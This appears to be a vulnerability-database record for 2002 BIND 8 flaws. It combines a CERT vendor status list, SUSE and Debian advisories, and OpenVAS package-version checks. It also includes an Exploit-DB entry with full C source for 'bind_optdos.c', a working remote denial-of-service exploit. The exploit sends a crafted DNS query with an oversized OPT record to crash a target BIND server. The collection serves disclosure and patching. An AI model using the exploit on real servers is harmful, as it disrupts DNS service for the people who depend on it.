Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Wirex Unknown\n\nNotified: November 12, 2002 Updated: November 13, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Xi Graphics Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### YARD RADIUS Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### djbdns Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### fetchmail Unknown\n\nNotified: November 14, 2002 Updated: November 14, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\nView all 66 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.isc.org/products/BIND/bind-security.html>\n * <http://www.isc.org/products/BIND/patches/bind4910.diff>\n\n### Acknowledgements\n\nThis vulnerability was reported by CERT/CC staff.\n\nThis document was written by Art Manion.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2002-0029](<http://web.nvd.nist.gov/vuln/detail/CVE-2002-0029>) \n---|--- \n**CERT Advisory:** | [CA-2002-31 ](<http://www.cert.org/advisories/CA-2002-31.html>) \n**Severity Metric:** | 8.91 \n**Date Public:** | 2002-11-12 \n**Date First Published:** | 2002-11-13 \n**Date Last Updated: ** | 2003-04-24 04:14 UTC \n**Document Revision: ** | 22 \n", "modified": "2003-04-24T04:14:00", "published": "2002-11-13T00:00:00", "id": "VU:844360", "href": "https://www.kb.cert.org/vuls/id/844360", "type": "cert", "title": "Domain Name System (DNS) stub resolver libraries vulnerable to buffer overflows via network name or address lookups", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T17:46:39", "description": "ISC BIND 8.3.x OPT Record Large UDP Denial of Service Vulnerability. CVE-2002-1220. Dos exploit for linux platform", "published": "2002-11-12T00:00:00", "type": "exploitdb", "title": "ISC BIND 8.3.x OPT Record Large UDP Denial of Service Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1220"], "modified": "2002-11-12T00:00:00", "id": "EDB-ID:22011", "href": "https://www.exploit-db.com/exploits/22011/", "sourceData": "source: http://www.securityfocus.com/bid/6161/info\r\n\r\nISC BIND is vulnerable to a denial of service attack. When a DNS lookup is requested on a non-existant sub-domain of a valid domain and an OPT resource record with a large UDP payload is attached, the server may fail. \r\n\r\n/*\r\n *\r\n * bind_optdos.c\r\n *\r\n * OPT DoS Remote Exploit for BIND 8.3.0 - 8.3.3-REL\r\n * Based on the bug disclosed by ISS\r\n *\r\n * (c) Spybreak (spybreak@host.sk) November/2002\r\n *\r\n * Proof of concept exploit code\r\n * For educational and testing purposes only!\r\n *\r\n *\r\n * Usage: ./bind_optdos domain target [udp_size]\r\n *\r\n * domain - should be a nonexistent subdomain\r\n * of an existing one, different from the target's,\r\n * or a domain whose authoritative name servers are\r\n * unreachable\r\n *\r\n *\r\n * Greetz to: sd, g00bER and hysteria.sk ;-)\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <signal.h>\r\n#include <time.h>\r\n\r\n#define UDP_SIZE 65535\r\n#define OPT 41\r\n#define PORT 53\r\n#define MAXRESP 1024\r\n#define TIMEOUT 10\r\n\r\ntypedef struct {\r\n unsigned short rcode : 4;\r\n unsigned short zero : 3;\r\n unsigned short ra : 1;\r\n unsigned short rd : 1;\r\n unsigned short tc : 1;\r\n unsigned short aa : 1;\r\n unsigned short opcode : 4;\r\n unsigned short qr : 1;\r\n} MSG_FLAGS;\r\n\r\ntypedef struct {\r\n unsigned short id;\r\n unsigned short flags;\r\n unsigned short nqst;\r\n unsigned short nansw;\r\n unsigned short nauth;\r\n unsigned short nadd;\r\n} DNS_MSG_HDR;\r\n\r\nvoid usage(char *argv0)\r\n{\r\n printf(\"********************************************\\n\"\r\n \"* OPT DoS Exploit for BIND 8.3.[0-3] *\\n\"\r\n \"* (c) Spybreak November/2002 *\\n\"\r\n \"********************************************\\n\");\r\n printf(\"\\n%s domain target [udp_size]\\n\\n\", argv0);\r\n exit(0);\r\n}\r\n\r\nvoid sig_alrm(int signo)\r\n{\r\n printf(\"No response yet, the target BIND seems to be down\\n\");\r\n exit(0);\r\n}\r\n\r\nmain(int argc, char **argv)\r\n{\r\n struct sockaddr_in targ_addr;\r\n struct hostent *he;\r\n MSG_FLAGS fl;\r\n DNS_MSG_HDR hdr;\r\n unsigned char qname[512], buff[1024];\r\n unsigned char *bu, *dom, *dot;\r\n int msg_size, dom_len, sockfd, n;\r\n unsigned short udp_size = UDP_SIZE;\r\n char response[MAXRESP + 1];\r\n\r\n if (argc < 3)\r\n usage(argv[0]);\r\n if (argc == 4)\r\n udp_size = (unsigned short) atoi(argv[3]);\r\n\r\n if (!(he = gethostbyname(argv[2]))) {\r\n printf(\"Invalid target '%s'\\n\", argv[2]);\r\n exit(-1);\r\n }\r\n\r\n printf(\"Query on domain: %s\\nTarget: %s\\n\", argv[1], argv[2]);\r\n printf(\"EDNS UDP size: %u\\n\", udp_size);\r\n\r\n if (argv[1][strlen(argv[1]) - 1] == '.')\r\n argv[1][strlen(argv[1]) - 1] = '\\0';\r\n\r\n strncpy(qname + 1, argv[1], sizeof(qname) - 2);\r\n dom = qname;\r\n\r\n while (dot = (unsigned char *) strchr(dom + 1, '.')) {\r\n *dom = dot - dom - 1;\r\n dom = dot;\r\n }\r\n *dom = strlen(dom + 1);\r\n dom_len = dom - qname + strlen(dom + 1) + 2;\r\n\r\n bu = buff;\r\n\r\n fl.qr = 0;\r\n fl.opcode = 0;\r\n fl.aa = 0;\r\n fl.tc = 0;\r\n fl.rd = 1;\r\n fl.ra = 0;\r\n fl.zero = 0;\r\n fl.rcode = 0;\r\n\r\n srand(time(0));\r\n hdr.id = htons((unsigned short) (65535.0*rand()/(RAND_MAX+1.0)) + 1);\r\n hdr.flags = htons(*((unsigned short *) &fl));\r\n hdr.nqst = htons(1);\r\n hdr.nansw = 0;\r\n hdr.nauth = 0;\r\n hdr.nadd = htons(1);\r\n\r\n bcopy(&hdr, bu, sizeof(hdr));\r\n bu += sizeof(hdr);\r\n bcopy(qname, bu, dom_len);\r\n bu += dom_len;\r\n *(((unsigned short *) bu)++) = htons(1); //query type\r\n *(((unsigned short *) bu)++) = htons(1); //query class\r\n\r\n //opt rr\r\n *bu++ = '\\0';\r\n *(((unsigned short *) bu)++) = htons(OPT); //type\r\n *(((unsigned short *) bu)++) = htons(udp_size); //udp payload size\r\n *(((unsigned int *) bu)++) = htons(0); //extended rcode and flags\r\n *(((unsigned short *) bu)++) = htons(0); //rdlen\r\n\r\n msg_size = bu - buff;\r\n\r\n bzero(&targ_addr, sizeof(targ_addr));\r\n targ_addr.sin_family = AF_INET;\r\n targ_addr.sin_port = htons(PORT);\r\n targ_addr.sin_addr = *(struct in_addr *) he->h_addr;\r\n\r\n sockfd = socket(AF_INET, SOCK_DGRAM, 0);\r\n if (sockfd < 0) {\r\n perror(\"socket\");\r\n exit(-1);\r\n }\r\n n = sendto(sockfd, buff, msg_size, 0, (struct sockaddr *) &targ_addr, (socklen_t) sizeof(targ_addr));\r\n if (n < 0) {\r\n perror(\"sendto\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"Datagram sent\\nWaiting for response ...\\n\");\r\n\r\n signal(SIGALRM, sig_alrm);\r\n alarm(TIMEOUT);\r\n n = recvfrom(sockfd, response, MAXRESP, 0, NULL, NULL);\r\n alarm(0);\r\n\r\n printf(\"Response received, the target BIND seems to be still up\\n\");\r\n printf(\"Maybe the target is not an OPT DoS vulnerable BIND version,recursion disabled, or try to change domain/udp_size, ...\\n\");\r\n exit(0);\r\n}\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22011/"}], "suse": [{"lastseen": "2016-09-04T12:25:39", "bulletinFamily": "unix", "cvelist": ["CVE-2002-1220", "CVE-2002-1219", "CVE-2002-1221"], "description": "The security research company ISS (Internet Security Services) has discovered several vulnerabilities in the BIND8 name server, including a remotely exploitable buffer overflow.", "edition": 1, "modified": "2002-11-14T10:23:37", "published": "2002-11-14T10:23:37", "id": "SUSE-SA:2002:044", "href": "http://lists.opensuse.org/opensuse-security-announce/2002-11/msg00009.html", "type": "suse", "title": "remote command execution in bind8", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-1220", "CVE-2002-1219", "CVE-2002-1221"], "description": "The remote host is missing an update to bind\nannounced via advisory DSA 196-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53584", "href": "http://plugins.openvas.org/nasl.php?oid=53584", "type": "openvas", "title": "Debian Security Advisory DSA 196-1 (bind)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_196_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 196-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"[Bind version 9, the bind9 package, is not affected by these problems.]\n\nISS X-Force has discovered several serious vulnerabilities in the Berkeley\nInternet Name Domain Server (BIND). BIND is the most common implementation\nof the DNS (Domain Name Service) protocol, which is used on the vast\nmajority of DNS servers on the Internet. DNS is a vital Internet protocol\nthat maintains a database of easy-to-remember domain names (host names) and\ntheir corresponding numerical IP addresses.\n\nCircumstancial evidence suggests that the Internet Software Consortium\n(ISC), maintainers of BIND, was made aware of these issues in mid-October.\nDistributors of Open Source operating systems, including Debian, were\nnotified of these vulnerabilities via CERT about 12 hours before the release\nof the advisories on November 12th. This notification did not include any\ndetails that allowed us to identify the vulnerable code, much less prepare\ntimely fixes.\n\nUnfortunately ISS and the ISC released their security advisories with only\ndescriptions of the vulnerabilities, without any patches. Even though there\nwere no signs that these exploits are known to the black-hat community, and\nthere were no reports of active attacks, such attacks could have been\ndeveloped in the meantime - with no fixes available.\n\nWe can all express our regret at the inability of the ironically named\nInternet Software Consortium to work with the Internet community in handling\nthis problem. Hopefully this will not become a model for dealing with\nsecurity issues in the future.\n\nThe Common Vulnerabilities and Exposures (CVE) project identified the\nfollowing vulnerabilities:\n\n1. CVE-2002-1219: A buffer overflow in BIND 8 versions 8.3.3 and earlier\nallows a remote attacker to execute arbitrary code via a certain DNS\nserver response containing SIG resource records (RR). This buffer\noverflow can be exploited to obtain access to the victim host under the\naccount the named process is running with, usually root.\n\n2. CVE-2002-1220: BIND 8 versions 8.3.x through 8.3.3 allows a remote\nattacker to cause a denial of service (termination due to assertion\nfailure) via a request for a subdomain that does not exist, with an OPT\nresource record with a large UDP payload size.\n\n3. CVE-2002-1221: BIND 8 versions 8.x through 8.3.3 allows a remote attacker\nto cause a denial of service (crash) via SIG RR elements with invalid\nexpiry times, which are removed from the internal BIND database and later\ncause a null dereference.\n\nThese problems have been fixed in version 8.3.3-2.0woody1 for the current\nstable distribution (woody), in 8.2.3-0.potato.3 for the previous stable\ndistribution (potato) and in version 8.3.3-3 for the unstable distribution\n(sid). The fixed packages for unstable will enter the archive today.\n\nWe recommend that you upgrade your bind package immediately, update to\";\ntag_summary = \"The remote host is missing an update to bind\nannounced via advisory DSA 196-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20196-1\";\n\nif(description)\n{\n script_id(53584);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:24:46 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2002-1219\", \"CVE-2002-1220\", \"CVE-2002-1221\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 196-1 (bind)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"task-dns-server\", ver:\"8.2.3-0.potato.3\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind-doc\", ver:\"8.2.3-0.potato.3\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind-dev\", ver:\"8.2.3-0.potato.3\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind\", ver:\"8.2.3-0.potato.3\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dnsutils\", ver:\"8.2.3-0.potato.3\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind-doc\", ver:\"8.3.3-2.0woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind-dev\", ver:\"8.3.3-2.0woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind\", ver:\"8.3.3-2.0woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dnsutils\", ver:\"8.2.3-0.potato.3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0029", "CVE-2002-1220", "CVE-2002-1219", "CVE-2002-1221"], "description": "Check for the Version of BIND", "modified": "2017-07-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:835099", "href": "http://plugins.openvas.org/nasl.php?oid=835099", "type": "openvas", "title": "HP-UX Update for BIND HPSBUX00233", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for BIND HPSBUX00233\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Execution of arbitrary code\n denial of service (DoS).\";\ntag_affected = \"BIND on\n HP-UX releases B.10.10, B.10.20, B.11.00, B.11.04 (VVOS), and B.11.11 \n running BIND 4.9.7 or BIND-8.1.2.\";\ntag_insight = \"A vulnerability in BIND DNS resolver libraries may allow remote attackers to \n execute arbitrary code with the privileges of the user running named, \n typically root or to create a denial of service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00957868-1\");\n script_id(835099);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"HPSBUX\", value: \"00233\");\n script_cve_id(\"CVE-2002-1219\", \"CVE-2002-1220\", \"CVE-2002-1221\", \"CVE-2002-0029\");\n script_name( \"HP-UX Update for BIND HPSBUX00233\");\n\n script_summary(\"Check for the Version of BIND\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"BINDv812.INETSVCS-BIND\", revision:\"B.11.00.01.004\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS-RUN\", patch_list:['PHNE_28449'], rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.04\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS-RUN\", patch_list:['PHNE_29634'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS-RUN\", patch_list:['PHNE_28450'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:39:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0029", "CVE-2002-1220", "CVE-2002-1219", "CVE-2002-1221"], "description": "Check for the Version of BIND", "modified": "2018-04-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:1361412562310835099", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835099", "type": "openvas", "title": "HP-UX Update for BIND HPSBUX00233", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for BIND HPSBUX00233\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Execution of arbitrary code\n denial of service (DoS).\";\ntag_affected = \"BIND on\n HP-UX releases B.10.10, B.10.20, B.11.00, B.11.04 (VVOS), and B.11.11 \n running BIND 4.9.7 or BIND-8.1.2.\";\ntag_insight = \"A vulnerability in BIND DNS resolver libraries may allow remote attackers to \n execute arbitrary code with the privileges of the user running named, \n typically root or to create a denial of service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00957868-1\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835099\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"HPSBUX\", value: \"00233\");\n script_cve_id(\"CVE-2002-1219\", \"CVE-2002-1220\", \"CVE-2002-1221\", \"CVE-2002-0029\");\n script_name( \"HP-UX Update for BIND HPSBUX00233\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of BIND\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"BINDv812.INETSVCS-BIND\", revision:\"B.11.00.01.004\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS-RUN\", patch_list:['PHNE_28449'], rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.04\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS-RUN\", patch_list:['PHNE_29634'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS-RUN\", patch_list:['PHNE_28450'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:22:37", "bulletinFamily": "unix", "cvelist": ["CVE-2002-1220", "CVE-2002-1219", "CVE-2002-1221"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 196-1 security@debian.org\nhttp://www.debian.org/security/ Daniel Jacobowitz\nNovember 14th, 2002 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : bind\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE Id : CAN-2002-1219 CAN-2002-1220 CAN-2002-1221\nCERT advisory : VU#844360 VU#852283 VU#229595 VU#542971\n\n[Bind version 9, the bind9 package, is not affected by these problems.]\n\nISS X-Force has discovered several serious vulnerabilities in the Berkeley\nInternet Name Domain Server (BIND). BIND is the most common implementation\nof the DNS (Domain Name Service) protocol, which is used on the vast\nmajority of DNS servers on the Internet. DNS is a vital Internet protocol\nthat maintains a database of easy-to-remember domain names (host names) and\ntheir corresponding numerical IP addresses.\n\nCircumstancial evidence suggests that the Internet Software Consortium\n(ISC), maintainers of BIND, was made aware of these issues in mid-October.\nDistributors of Open Source operating systems, including Debian, were\nnotified of these vulnerabilities via CERT about 12 hours before the release\nof the advisories on November 12th. This notification did not include any\ndetails that allowed us to identify the vulnerable code, much less prepare\ntimely fixes.\n\nUnfortunately ISS and the ISC released their security advisories with only\ndescriptions of the vulnerabilities, without any patches. Even though there\nwere no signs that these exploits are known to the black-hat community, and\nthere were no reports of active attacks, such attacks could have been\ndeveloped in the meantime - with no fixes available.\n\nWe can all express our regret at the inability of the ironically named\nInternet Software Consortium to work with the Internet community in handling\nthis problem. Hopefully this will not become a model for dealing with\nsecurity issues in the future.\n\nThe Common Vulnerabilities and Exposures (CVE) project identified the\nfollowing vulnerabilities:\n\n1. CAN-2002-1219: A buffer overflow in BIND 8 versions 8.3.3 and earlier\n allows a remote attacker to execute arbitrary code via a certain DNS\n server response containing SIG resource records (RR). This buffer\n overflow can be exploited to obtain access to the victim host under the\n account the named process is running with, usually root.\n\n2. CAN-2002-1220: BIND 8 versions 8.3.x through 8.3.3 allows a remote\n attacker to cause a denial of service (termination due to assertion\n failure) via a request for a subdomain that does not exist, with an OPT\n resource record with a large UDP payload size.\n\n3. CAN-2002-1221: BIND 8 versions 8.x through 8.3.3 allows a remote attacker\n to cause a denial of service (crash) via SIG RR elements with invalid\n expiry times, which are removed from the internal BIND database and later\n cause a null dereference.\n\nThese problems have been fixed in version 8.3.3-2.0woody1 for the current\nstable distribution (woody), in 8.2.3-0.potato.3 for the previous stable\ndistribution (potato) and in version 8.3.3-3 for the unstable distribution\n(sid). The fixed packages for unstable will enter the archive today.\n\nWe recommend that you upgrade your bind package immediately, update to\nbind9, or switch to another DNS server implementation.\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian 2.2 (oldstable)\n- 